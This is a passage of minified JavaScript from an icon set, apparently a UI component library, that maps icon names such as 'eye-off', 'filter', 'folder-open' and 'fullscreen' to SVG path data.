1.003 0 0 0 4 9zm12 2c-.28 0-.53.11-.71.29L10 16.59 4.71 11.3A.965.965 0 0 0 4 11a1.003 1.003 0 0 0-.71 1.71l6 6c.18.18.43.29.71.29s.53-.11.71-.29l6-6A1.003 1.003 0 0 0 16 11z"],export:["M5 7c.28 0 .53-.11.71-.29L9 3.41V15c0 .55.45 1 1 1s1-.45 1-1V3.41l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-5-5C10.53.11 10.28 0 10 0s-.53.11-.71.29l-5 5A1.003 1.003 0 0 0 5 7zm14 7c-.55 0-1 .45-1 1v3H2v-3c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .55.45 1 1 1h18c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1z"],"eye-off":["M20 9.96v-.03-.01-.02-.02a.794.794 0 0 0-.21-.43c-.55-.69-1.19-1.3-1.85-1.87l-3.93 2.62a3.966 3.966 0 0 1-3.96 3.77c-.47 0-.91-.1-1.33-.24l-2.24 1.49c.52.21 1.05.39 1.6.51 1.21.27 2.43.28 3.64.05 1.11-.21 2.17-.64 3.17-1.18 1.56-.84 2.99-2 4.23-3.3.23-.24.46-.49.67-.75a.87.87 0 0 0 .21-.43v-.02-.02-.01-.03V10v-.04zm-.46-5.14c.27-.18.46-.47.46-.82 0-.55-.45-1-1-1-.21 0-.39.08-.54.18l-.01-.02L15 5.46c-.95-.53-1.95-.96-3.01-1.2a9.158 9.158 0 0 0-3.65-.04c-1.11.21-2.17.64-3.17 1.18-1.56.84-2.99 2-4.23 3.3-.23.24-.46.48-.67.75-.27.34-.27.76 0 1.1.64.79 1.39 1.5 2.16 2.15.26.21.52.41.79.61L.44 15.16l.01.02A1 1 0 0 0 0 16c0 .55.45 1 1 1 .21 0 .39-.08.54-.18l.01.02 18-12-.01-.02zm-8.67 3.4c-.25-.12-.53-.2-.83-.2-1.1 0-1.99.89-1.99 1.99 0 .03.02.06.02.09l-1.78 1.19c-.14-.4-.22-.83-.22-1.28 0-2.19 1.78-3.97 3.98-3.97 1.01 0 1.91.38 2.61 1l-1.79 1.18z"],"eye-on":["M13.3 8.71c.18.18.43.29.71.29s.53-.11.71-.29l4.99-5a1.003 1.003 0 0 0-1.42-1.42L14 6.58l-2.29-2.29a.956.956 0 0 0-.7-.29 1.003 1.003 0 0 0-.71 1.71l3 3zM20 9.96v-.03-.01-.02-.02a.823.823 0 0 0-.21-.44c-.44-.55-.94-1.05-1.46-1.52l-2.2 2.2c-.55.54-1.3.88-2.12.88-.05 0-.09-.01-.14-.01a3.978 3.978 0 0 1-3.86 3.02 4.007 4.007 0 0 1-1.66-7.65A2.97 2.97 0 0 1 8.02 5c0-.28.05-.54.12-.8-1.05.22-2.07.64-3.02 1.15-1.57.85-3 2.02-4.24 3.33-.23.25-.46.5-.67.76-.28.35-.28.77 0 1.12.64.8 1.4 1.52 2.17 2.17 1.66 1.41 3.56 2.58 5.66 3.06 1.21.27 2.43.29 3.65.05 1.11-.21 2.18-.65 3.18-1.19 1.57-.85 3-2.02 4.24-3.33.23-.24.46-.49.67-.76.11-.12.18-.27.21-.44v-.02-.02-.01-.03V10c.01-.01.01-.03.01-.04zm-9.99 2.05c1.03 0 1.87-.79 1.98-1.8l-.09-.09-.01.01-2.1-2.11c-1 .11-1.77.95-1.77 1.98-.01 1.11.89 2.01 1.99 2.01z"],"eye-open":["M10.01 7.984A2.008 2.008 0 0 0 8.012 9.99c0 1.103.9 2.006 1.998 2.006a2.008 2.008 0 0 0 1.998-2.006c0-1.103-.9-2.006-1.998-2.006zM20 9.96v-.03-.01-.02-.02a.827.827 0 0 0-.21-.442c-.64-.802-1.398-1.514-2.168-2.166-1.658-1.404-3.566-2.587-5.664-3.058a8.982 8.982 0 0 0-3.656-.05c-1.11.2-2.178.641-3.177 1.183-1.569.852-2.997 2.016-4.246 3.33-.23.25-.46.49-.67.761-.279.351-.279.773 0 1.124.64.802 1.4 1.514 2.169 2.166 1.658 1.404 3.566 2.577 5.664 3.058 1.209.271 2.438.281 3.656.05 1.11-.21 2.178-.651 3.177-1.193 1.569-.852 2.997-2.016 4.246-3.33.23-.24.46-.49.67-.751.11-.12.179-.271.209-.442v-.02-.02-.01-.03V10v-.04zM10.01 14A4.003 4.003 0 0 1 6.014 9.99a4.003 4.003 0 0 1 3.996-4.011 4.003 4.003 0 0 1 3.996 4.011 4.003 4.003 0 0 1-3.996 4.011z"],"fast-backward":["M18 3c-.23 0-.42.09-.59.21l-.01-.01L11 8V4c0-.55-.45-1-1-1-.23 0-.42.09-.59.21L9.4 3.2l-8 6 .01.01C1.17 9.4 1 9.67 1 10s.17.6.41.79l-.01.01 8 6 .01-.01c.17.12.36.21.59.21.55 0 1-.45 1-1v-4l6.4 4.8.01-.01c.17.12.36.21.59.21.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],"fast-forward":["M19 10c0-.33-.17-.6-.41-.79l.01-.01-8-6-.01.01C10.42 3.09 10.23 3 10 3c-.55 0-1 .45-1 1v4L2.6 3.2l-.01.01C2.42 3.09 2.23 3 2 3c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1 .23 0 .42-.09.59-.21l.01.01L9 12v4c0 .55.45 1 1 1 .23 0 .42-.09.59-.21l.01.01 8-6-.01-.01c.24-.19.41-.46.41-.79z"],feed:["M2.5 15a2.5 2.5 0 0 0 0 5 2.5 2.5 0 0 0 0-5zm.5-5c-.55 0-1 .45-1 1s.45 1 1 1c2.76 0 5 2.24 5 5 0 .55.45 1 1 1s1-.45 1-1c0-3.87-3.13-7-7-7zM3 0c-.55 0-1 .45-1 1s.45 1 1 1c8.28 0 15 6.72 15 15 0 .55.45 1 1 1s1-.45 1-1C20 7.61 12.39 0 3 0zm0 5c-.55 0-1 .45-1 1s.45 1 1 1c5.52 0 10 4.48 10 10 0 .55.45 1 1 1s1-.45 1-1C15 10.37 9.63 5 3 5z"],"feed-subscribed":["M2.5 15a2.5 2.5 0 0 0 0 5 2.5 2.5 0 0 0 0-5zM3 2c1.76 0 3.44.31 5.01.87.03-.71.31-1.35.75-1.85C6.96.37 5.03 0 3 0c-.55 0-1 .45-1 1s.45 1 1 1zm10.32 4.67a.99.99 0 0 0 1.4 0l4.98-4.98c.19-.17.3-.42.3-.7 0-.55-.45-1-1-1a.99.99 0 0 0-.7.29l-4.27 4.27-2.28-2.28a.99.99 0 0 0-.7-.29c-.55 0-.99.45-.99 1 0 .28.11.52.29.7l2.97 2.99zM3 10c-.55 0-1 .45-1 1s.45 1 1 1c2.76 0 5 2.24 5 5 0 .55.45 1 1 1s1-.45 1-1c0-3.87-3.13-7-7-7zm13.94-2.69l-.82.82-.02-.02c-.2.2-.42.37-.67.51A14.8 14.8 0 0 1 18 17c0 .55.45 1 1 1s1-.45 1-1c0-3.61-1.14-6.94-3.06-9.69zM3 5c-.55 0-1 .45-1 1s.45 1 1 1c5.52 0 10 4.48 10 10 0 .55.45 1 1 1s1-.45 1-1C15 10.37 9.63 5 3 5z"],film:["M19 2h-5v3H6V2H1c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h5v-3h8v3h5c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zM4 17H2v-2h2v2zm0-3H2v-2h2v2zm0-3H2V9h2v2zm0-3H2V6h2v2zm0-3H2V3h2v2zm10 8H6V7h8v6zm4 4h-2v-2h2v2zm0-3h-2v-2h2v2zm0-3h-2V9h2v2zm0-3h-2V6h2v2zm0-3h-2V3h2v2z"],filter:["M18 1H2a1.003 1.003 0 0 0-.71 1.71L7 8.41V18a1.003 1.003 0 0 0 1.71.71l4-4c.18-.18.29-.43.29-.71V8.41l5.71-5.71c.18-.17.29-.42.29-.7 0-.55-.45-1-1-1z"],"filter-keep":["M15 2c0-.55-.45-1-1-1H1a1.003 1.003 0 0 0-.71 1.71L5 7.41V16a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71V7.41l4.71-4.71c.18-.17.29-.42.29-.7zm4 11c-.28 0-.53.11-.71.29L15 16.59l-1.29-1.29A.965.965 0 0 0 13 15a1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l4-4A1.003 1.003 0 0 0 19 13z"],"filter-list":["M15 2c0-.55-.45-1-1-1H1a1.003 1.003 0 0 0-.71 1.71L5 7.41V16a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71V7.41l4.71-4.71c.18-.17.29-.42.29-.7zm-4 8c0 .55.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1h-7c-.55 0-1 .45-1 1zm8 7h-7c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1zm0-4h-7c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1z"],"filter-remove":["M15 2c0-.55-.45-1-1-1H1a1.003 1.003 0 0 0-.71 1.71L5 7.41V16a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71V7.41l4.71-4.71c.18-.17.29-.42.29-.7zm2.91 13.5l1.79-1.79c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-1.79 1.79-1.79-1.79a1.003 1.003 0 0 0-1.42 1.42l1.79 1.79-1.79 1.79a1.003 1.003 0 0 0 1.42 1.42l1.79-1.79 1.79 1.79a1.003 1.003 0 0 0 1.42-1.42l-1.8-1.79z"],flag:["M3 3c-.55 0-1 .45-1 1v15c0 .55.45 1 1 1s1-.45 1-1V4c0-.55-.45-1-1-1zm0-3c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm2 4.08v8.28c3.01-2.41 8.67 2.64 13 0V4.08C13.61 7.14 8.01 1 5 4.08z"],flame:["M11.622 0c0 1.71.49 3.077 1.472 4.103C16.364 6.496 18 9.23 18 12.308c0 3.418-1.962 5.983-5.887 7.692 2.887-3 2.453-4.23-.49-8C8.5 13.5 9 14.5 9.5 16.5c-1.048 0-2 0-2.5-.5 0 .684 1.197 2.5 1.952 4-3.924-1.026-8.123-7.18-6.651-7.692.981-.342 2.126-.171 3.434.513C4.1 6.667 6.062 2.393 11.622 0z"],flash:["M4.96 6.37a1.003 1.003 0 0 0 1.42-1.42l-2-2a1.07 1.07 0 0 0-.71-.28 1.003 1.003 0 0 0-.71 1.71l2 1.99zm9.37.3c.28 0 .53-.11.71-.29l2-2a1.003 1.003 0 0 0-1.42-1.42l-2 2a1.003 1.003 0 0 0 .71 1.71zM10 5c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1S9 .45 9 1v3c0 .55.45 1 1 1zm-5 5c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1h3c.55 0 1-.45 1-1zm14-1h-3c-.55 0-1 .45-1 1s.45 1 1 1h3c.55 0 1-.45 1-1s-.45-1-1-1zm-9-3c-2.21 0-4 1.79-4 4s1.79 4 4 4 4-1.79 4-4-1.79-4-4-4zm0 6c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zm5.04 1.63a1.003 1.003 0 0 0-1.42 1.42l2 2a1.003 1.003 0 0 0 1.42-1.42l-2-2zM10 15c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1s1-.45 1-1v-3c0-.55-.45-1-1-1zm-4.33-1.67c-.28 0-.53.11-.71.29l-2 2a1.003 1.003 0 0 0 1.42 1.42l2-2a1.003 1.003 0 0 0-.71-1.71z"],"floppy-disk":["M14 1h-3v5h3V1zm5.71 2.29l-3-3A.997.997 0 0 0 16 0h-1v7H5V0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V4c0-.28-.11-.53-.29-.71zM17 19H3v-8c0-.55.45-1 1-1h12c.55 0 1 .45 1 1v8z"],"flow-branch":["M14.425 7.953a3.98 3.98 0 0 1 .562 2.045 3.98 3.98 0 0 1-.583 2.08L18 15.671V12.98c0-.248.097-.496.29-.689.379-.379 1.047-.38 1.426 0a.94.94 0 0 1 .283.696l-.001 5.049a.957.957 0 0 1-.276.69.955.955 0 0 1-.69.273h-5.059a.971.971 0 0 1-.689-.289 1.026 1.026 0 0 1 0-1.417.972.972 0 0 1 .69-.29h2.702l-3.634-3.573a3.998 3.998 0 0 1-5.924-2.431H1a1 1 0 0 1 0-2h6.12a3.998 3.998 0 0 1 5.96-2.409L16.665 3l-2.694-.001a.972.972 0 0 1-.689-.29 1.035 1.035 0 0 1 0-1.425.94.94 0 0 1 .696-.283l5.05.001c.248 0 .497.083.69.276a.954.954 0 0 1 .272.69l.001 5.052a.971.971 0 0 1-.29.689 1.028 1.028 0 0 1-1.419 0 .972.972 0 0 1-.29-.69V4.323l-3.567 3.63z"],"flow-end":["M12 9.919a3.998 3.998 0 0 1 4-3.92c2.21 0 4 1.79 4 3.997a3.998 3.998 0 0 1-4 3.996 3.998 3.998 0 0 1-4-3.916.967.967 0 0 1-.28.612L7.685 14.71a.958.958 0 0 1-.686.285c-.536 0-.994-.461-.994-.997 0-.273.107-.528.283-.704l2.379-2.302H.98c-.537 0-.976-.46-.976-.996s.44-.992.976-.992h7.676L6.287 6.687a.957.957 0 0 1-.283-.686c0-.536.458-.996.994-.996.274 0 .51.1.686.285l4.027 4.024c.159.158.27.365.29.605z"],"flow-linear":["M5.125 10.997H.976C.439 10.997 0 10.537 0 10c0-.536.44-.993.976-.993h4.148a4.002 4.002 0 0 1 7.752 0h3.776L14.293 6.69a.962.962 0 0 1-.285-.687c0-.537.46-1.001.996-1.001a.96.96 0 0 1 .698.3l4.005 4.015c.176.176.293.41.293.683a.972.972 0 0 1-.283.693L15.702 14.7a.997.997 0 0 1-.698.297c-.537 0-.996-.453-.996-.99 0-.273.107-.517.283-.692l2.371-2.318h-3.787a4.002 4.002 0 0 1-7.75 0z"],"flow-review":["M6.13 9.004A4.005 4.005 0 0 1 10.012 6c1.87 0 3.44 1.278 3.881 3.005h2.768l-2.354-2.317a.97.97 0 0 1-.283-.691c0-.536.462-.995 1-.995.273 0 .517.107.693.283l4 4.041a.97.97 0 0 1 .284.692.956.956 0 0 1-.293.682l-3.991 3.997a.944.944 0 0 1-.694.292c-.537 0-1-.46-1-.997a.97.97 0 0 1 .284-.692l2.345-2.29h-2.765a4.005 4.005 0 0 1-3.875 2.981 4.005 4.005 0 0 1-3.874-2.981H3.349l2.376 2.308a.97.97 0 0 1 .283.691 1 1 0 0 1-.994.983.989.989 0 0 1-.713-.291L.293 10.699A.956.956 0 0 1 0 10.017a.97.97 0 0 1 .283-.692l4.03-4.037a.996.996 0 0 1 .701-.283c.537 0 .994.464.994 1a.97.97 0 0 1-.283.691L3.34 9.004h2.79z"],"flow-review-branch":["M13.04 13.424c-.6.36-1.302.568-2.052.568a4 4 0 0 1-3.868-2.999H3.342l2.372 2.31c.176.176.283.42.283.694 0 .537-.452.998-.988.998a.935.935 0 0 1-.691-.289L.292 10.683A.96.96 0 0 1 0 9.999c0-.274.107-.518.283-.694l4.035-4.04a.973.973 0 0 1 .691-.288c.536 0 .988.47.988 1.007a.975.975 0 0 1-.283.694L3.332 8.984h3.786a4 4 0 0 1 3.87-3.006c.771 0 1.492.22 2.102.599l3.565-3.57-2.538-.003a.974.974 0 0 1-.69-.29c-.38-.38-.38-1.052-.002-1.431A.94.94 0 0 1 14.122 1l4.896.005a.96.96 0 0 1 .69.277c.193.193.27.442.27.69l.005 4.9a.971.971 0 0 1-.289.69 1.023 1.023 0 0 1-1.416 0 .975.975 0 0 1-.29-.691l-.003-2.54-3.554 3.62c.351.596.553 1.291.553 2.034 0 .763-.213 1.477-.583 2.084l3.595 3.595.003-2.54c0-.249.097-.497.29-.69.38-.38 1.05-.381 1.429-.002a.94.94 0 0 1 .282.697l-.005 4.9a.927.927 0 0 1-.277.675.974.974 0 0 1-.69.291L13.974 19a.97.97 0 0 1-.69-.29 1.03 1.03 0 0 1 .002-1.42.974.974 0 0 1 .69-.29l2.696-.003-3.632-3.573z"],flows:["M17.5 7.93a2.5 2.5 0 0 0-2.45 2h-2.3l-4.01-4-.75.75 3.26 3.25h-6.3a2.5 2.5 0 1 0 0 1h6.3l-3.26 3.25.75.75 4.01-4h2.3a2.5 2.5 0 1 0 2.45-3z"],"folder-close":["M0 17c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V7H0v10zM19 4H9.41l-1.7-1.71A.997.997 0 0 0 7 2H1c-.55 0-1 .45-1 1v3h20V5c0-.55-.45-1-1-1z"],"folder-new":["M12.994 7c0 1.655 1.344 3 2.998 3a3.002 3.002 0 0 0 2.999-3H20v10c0 .55-.45 1-1 1H1.01c-.55 0-1-.45-1-1V7h12.984zM10.76 6H0V3c0-.55.45-1 1-1h3.998c.28 0 .53.11.71.29L7.415 4h2.579c0 .768.29 1.469.765 2zm8.23-3c.55 0 1 .45 1 1s-.45 1-1 1h-1.998v2c0 .55-.45 1-1 1s-1-.45-1-1V5h-1.998c-.55 0-1-.45-1-1s.45-1 1-1h1.999V1c0-.55.45-1 .999-1 .55 0 1 .45 1 1v2h1.999z"],"folder-open":["M20 9c0-.55-.45-1-1-1H5c-.43 0-.79.27-.93.65h-.01l-3 8h.01c-.04.11-.07.23-.07.35 0 .55.45 1 1 1h14c.43 0 .79-.27.93-.65h.01l3-8h-.01c.04-.11.07-.23.07-.35zM3.07 7.63C3.22 7.26 3.58 7 4 7h14V5c0-.55-.45-1-1-1H8.41l-1.7-1.71A.997.997 0 0 0 6 2H1c-.55 0-1 .45-1 1v12.31l3.07-7.68z"],"folder-shared":["M11 4H9.41l-1.7-1.71A.997.997 0 0 0 7 2H1c-.55 0-1 .45-1 1v3h11.78C11.3 5.47 11 4.77 11 4zm8-1h-5c-.55 0-1 .45-1 1s.45 1 1 1h2.59L12.3 9.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L18 6.41V9c0 .55.45 1 1 1s1-.45 1-1V4c0-.55-.45-1-1-1zm-2.46 7.7l-1.42 1.42a2.996 2.996 0 1 1-4.24-4.24l.88-.88H0v10c0 .55.45 1 1 1h18c.55 0 1-.45 1-1v-5.18c-.31.11-.65.18-1 .18-1.02 0-1.92-.52-2.46-1.3z"],"folder-shared-open":["M3.07 7.63C3.22 7.26 3.58 7 4 7h7.76l.54-.54A2.97 2.97 0 0 1 11 4H8.41l-1.7-1.71A.997.997 0 0 0 6 2H1c-.55 0-1 .45-1 1v12.31l3.07-7.68zm13.47 3.07l-1.42 1.42A2.996 2.996 0 0 1 10 10c0-.77.3-1.47.78-2H5c-.43 0-.79.27-.93.65h-.01l-3 8h.01c-.04.11-.07.23-.07.35 0 .55.45 1 1 1h14c.43 0 .79-.27.93-.65h.01l2.01-5.36c-1-.01-1.88-.52-2.41-1.29zM19 3h-5c-.55 0-1 .45-1 1s.45 1 1 1h2.59L12.3 9.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L18 6.41V9c0 .55.45 1 1 1s1-.45 1-1V4c0-.55-.45-1-1-1z"],follower:["M11.54 15.92c-1.48-.65-1.28-1.05-1.33-1.59-.01-.07-.01-.15-.01-.23.51-.45.92-1.07 1.19-1.78 0 0 .01-.04.02-.05.06-.15.11-.32.15-.48.34-.07.54-.44.61-.78.08-.14.23-.48.2-.87-.05-.5-.25-.73-.47-.82v-.09c0-.63-.06-1.55-.17-2.15-.02-.17-.06-.33-.11-.5a3.69 3.69 0 0 0-1.29-1.86C9.69 4.25 8.8 4 8.01 4c-.8 0-1.69.25-2.32.73-.61.47-1.06 1.13-1.28 1.86-.05.17-.09.33-.11.5-.12.6-.18 1.51-.18 2.14v.08c-.23.09-.44.32-.49.83-.04.39.12.73.2.87.08.35.28.72.63.78.04.17.09.33.15.48 0 .01.01.02.01.03l.01.01c.27.72.7 1.35 1.22 1.8 0 .07-.01.14-.01.21-.05.54.1.94-1.38 1.59-1.48.65-3.71 1.35-4.16 2.4C-.16 19.38.02 20 .02 20h15.95s.18-.62-.27-1.67c-.46-1.06-2.68-1.75-4.16-2.41zm8.15-12.63l-3-3a.956.956 0 0 0-.7-.29 1.003 1.003 0 0 0-.71 1.71L16.58 3H13c-.55 0-1 .45-1 1s.45 1 1 1h3.58l-1.29 1.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.3-.71z"],following:["M11.55 15.92c-1.48-.65-1.28-1.05-1.33-1.59-.01-.07-.01-.15-.01-.23.51-.45.92-1.07 1.19-1.78 0 0 .01-.04.02-.05.06-.15.11-.32.15-.48.34-.07.54-.44.61-.78.08-.14.23-.48.2-.87-.05-.5-.25-.73-.47-.82v-.09c0-.63-.06-1.55-.17-2.15-.02-.17-.06-.33-.11-.5a3.69 3.69 0 0 0-1.29-1.86C9.7 4.25 8.81 4 8.02 4c-.79 0-1.68.25-2.31.73-.61.47-1.07 1.13-1.29 1.86-.05.16-.09.33-.11.5-.12.6-.18 1.51-.18 2.14v.08c-.23.09-.44.32-.48.83-.04.39.12.73.2.87.08.35.28.72.63.78.04.17.09.33.15.48 0 .01.01.02.01.03l.01.01c.27.72.7 1.35 1.22 1.8 0 .07-.01.14-.01.21-.05.54.1.94-1.38 1.59C3 16.56.77 17.26.32 18.31-.15 19.38.04 20 .04 20h15.95s.18-.62-.27-1.67c-.46-1.06-2.69-1.75-4.17-2.41zM19 3h-3.58l1.29-1.29A1.003 1.003 0 0 0 15.29.29l-3 3c-.17.18-.28.43-.28.71 0 .28.11.53.29.71l3 3c.18.18.43.29.7.29a1.003 1.003 0 0 0 .71-1.71L15.42 5H19c.55 0 1-.45 1-1s-.45-1-1-1z"],font:["M17.93 18.64l-7-18C10.78.27 10.42 0 10 0s-.78.27-.93.64l-7 18c-.04.11-.07.23-.07.36 0 .55.45 1 1 1 .42 0 .78-.27.93-.64L6.41 13h7.19l2.47 6.36c.15.37.51.64.93.64.55 0 1-.45 1-1 0-.13-.03-.25-.07-.36zM7.18 11L10 3.76 12.82 11H7.18z"],fork:["M16.71 11.29a1.003 1.003 0 0 0-1.42 1.42l1.3 1.29h-2.17l-8-8h10.17L15.3 7.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-3-3a1.003 1.003 0 0 0-1.42 1.42L16.59 4H1c-.55 0-1 .45-1 1s.45 1 1 1h2.59l9.71 9.71c.17.18.42.29.7.29h2.59l-1.29 1.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-3-3z"],form:["M2 13v4h4v-4H2zm-1-2h6c.55 0 1 .45 1 1v6c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1v-6c0-.55.45-1 1-1zm11-7h7c.55 0 1 .45 1 1s-.45 1-1 1h-7c-.55 0-1-.45-1-1s.45-1 1-1zM8 1a1.003 1.003 0 0 1 .71 1.71l-5 6C3.53 8.89 3.28 9 3 9s-.53-.11-.71-.29l-2-2a1.003 1.003 0 0 1 1.42-1.42L3 6.59l4.29-5.3C7.47 1.11 7.72 1 8 1zm4 13h7c.55 0 1 .45 1 1s-.45 1-1 1h-7c-.55 0-1-.45-1-1s.45-1 1-1z"],"full-circle":["M9.96 0a10 10 0 1 0 0 20 10 10 0 1 0 0-20z"],"full-stacked-chart":["M15 16h2c.55 0 1-.45 1-1v-5h-4v5c0 .55.45 1 1 1zM12 2c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1v4h4V2zm6 4h-4v3h4V6zm0-4c0-.55-.45-1-1-1h-2c-.55 0-1 .45-1 1v3h4V2zm-6 5H8v5h4V7zm-9 9h2c.55 0 1-.45 1-1v-3H2v3c0 .55.45 1 1 1zm6 0h2c.55 0 1-.45 1-1v-2H8v2c0 .55.45 1 1 1zm10 1H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zM6 2c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v3h4V2zm0 4H2v5h4V6z"],fullscreen:["M3.41 2H6c.55 0 1-.45 1-1s-.45-1-1-1H1C.45 0 0 .45 0 1v5c0 .55.45 1 1 1s1-.45 1-1V3.41L7.29 8.7c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L3.41 2zM8 11c-.28 0-.53.11-.71.29L2 16.59V14c0-.55-.45-1-1-1s-1 .45-1 1v5c0 .55.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1H3.41l5.29-5.29c.19-.18.3-.43.3-.71 0-.55-.45-1-1-1zM19 0h-5c-.55 0-1 .45-1 1s.45 1 1 1h2.59L11.3 7.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L18 3.41V6c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm0 13c-.55 0-1 .45-1 1v2.59l-5.29-5.29A.965.965 0 0 0 12 11a1.003 1.003 0 0 0-.71 1.71l5.3 5.29H14c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1v-5c0-.55-.45-1-1-1z"],function:["M10.14 5.82H8.73c.4-1.66.94-2.87 1.6-3.64.4-.48.8-.72 1.18-.72.08 0 .14.02.19.07.05.05.07.1.07.18 0 .07-.05.19-.16.37s-.16.36-.16.52c0 .23.08.43.25.59a.9.9 0 0 0 .64.25c.28 0 .51-.1.7-.3.19-.2.28-.47.28-.81 0-.39-.14-.7-.42-.94-.28-.24-.74-.36-1.36-.36-.97 0-1.86.29-2.65.87-.79.56-1.54 1.52-2.26 2.85-.24.46-.48.75-.7.88-.22.13-.57.19-1.06.19l-.32 1.15H5.9l-1.99 7.85c-.33 1.29-.56 2.09-.67 2.39-.17.44-.43.81-.77 1.12a.74.74 0 0 1-.5.19c-.05 0-.1-.02-.14-.05l-.04-.07c0-.03.05-.1.15-.2.1-.1.15-.26.15-.47 0-.23-.08-.42-.23-.57-.16-.15-.38-.23-.67-.23-.35 0-.63.1-.85.29-.21.2-.32.43-.32.7 0 .29.13.54.39.75.25.22.65.33 1.2.33.88 0 1.66-.23 2.33-.69.68-.46 1.27-1.17 1.78-2.14.51-.96 1.03-2.52 1.56-4.66l1.14-4.54H9.8l.34-1.15zm6.8 1.95c.25-.2.51-.29.78-.29.1 0 .29.04.56.11.27.08.51.11.72.11.29 0 .52-.1.72-.3.18-.19.28-.45.28-.77 0-.33-.1-.6-.29-.8-.19-.2-.47-.29-.82-.29-.32 0-.62.08-.9.23-.28.15-.64.49-1.08 1-.33.38-.81 1.05-1.44 2a9.712 9.712 0 0 0-1.31-3.22l-3.4.59-.07.37c.25-.05.47-.08.64-.08.34 0 .62.15.84.44.35.46.84 1.85 1.46 4.19-.49.66-.82 1.09-1 1.3-.3.33-.55.54-.74.64-.15.08-.32.12-.51.12-.14 0-.38-.08-.7-.24-.22-.1-.42-.16-.59-.16-.33 0-.6.11-.82.32-.21.22-.32.49-.32.83 0 .31.1.57.3.77.2.2.47.29.8.29.32 0 .63-.07.92-.21.29-.14.64-.43 1.08-.88.43-.45 1.03-1.16 1.79-2.14.29.93.55 1.61.76 2.03.21.42.46.73.74.91.28.19.62.28 1.04.28.4 0 .81-.15 1.23-.44.55-.38 1.1-1.04 1.68-1.97l-.35-.21c-.39.55-.68.89-.87 1.03-.12.09-.27.13-.44.13-.2 0-.4-.13-.59-.38-.33-.43-.77-1.63-1.33-3.6.47-.86.89-1.44 1.23-1.71z"],"gantt-chart":["M4 7h5c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1zm3 2v1c0 .55.45 1 1 1h6c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1H8c-.55 0-1 .45-1 1zm12 3h-6c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h6c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zm0 4H2V3c0-.55-.45-1-1-1s-1 .45-1 1v14c0 .55.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1z"],geolocation:["M0 8.33l9.17 2.5 2.5 9.17L20 0z"],geosearch:["M8 18.88c-3.79 0-6.88-3.09-6.88-6.88 0-.61.08-1.22.23-1.79.03.01.06-.01.1-.01h.09v.55c0 .23.21.42.44.42.04 0 .09-.01.12-.02l.9.88c.09.09.23.09.32 0s.09-.23 0-.32l-.86-.9c0-.02.05-.04.05-.07v-.13c0-.18.1-.25.29-.41h.53c.1 0 .19-.01.27-.05.01-.01.02 0 .03-.01.02-.01.03-.02.05-.04.01-.01.02-.01.02-.02l.02-.02 1.13-1.13c-.16-.32-.3-.65-.42-.99h-.64v-.53c0-.01.06.06.06-.1h.38c-.04-.16-.08-.32-.1-.48h-.71c.2-.16.42-.31.64-.45C4.02 6.09 4 5.8 4 5.5c0-.14.01-.28.02-.43C1.62 6.46 0 9.04 0 12c0 4.41 3.59 8 8 8 3.87 0 7.09-2.77 7.82-6.44l-.97-1.1c-.26 3.57-3.23 6.42-6.85 6.42zm-2.12-3.67v-.35h.15c.29 0 .49-.23.49-.53v-.68c0-.01.01-.01 0-.02L4.71 11.8h-.77c-.29 0-.47.24-.47.53v2c0 .29.18.53.47.53h.33v2.02c0 .28.28.51.56.51s.56-.23.56-.51v-1.22h-.01c.29 0 .5-.16.5-.45zm13.83-2.92l-3.68-3.68c.14-.21.27-.42.38-.65.02-.04.04-.07.05-.11.11-.22.2-.45.28-.69v-.01c.07-.24.13-.48.17-.73l.03-.17c.04-.24.06-.49.06-.75C17 2.46 14.54 0 11.5 0S6 2.46 6 5.5 8.46 11 11.5 11c.26 0 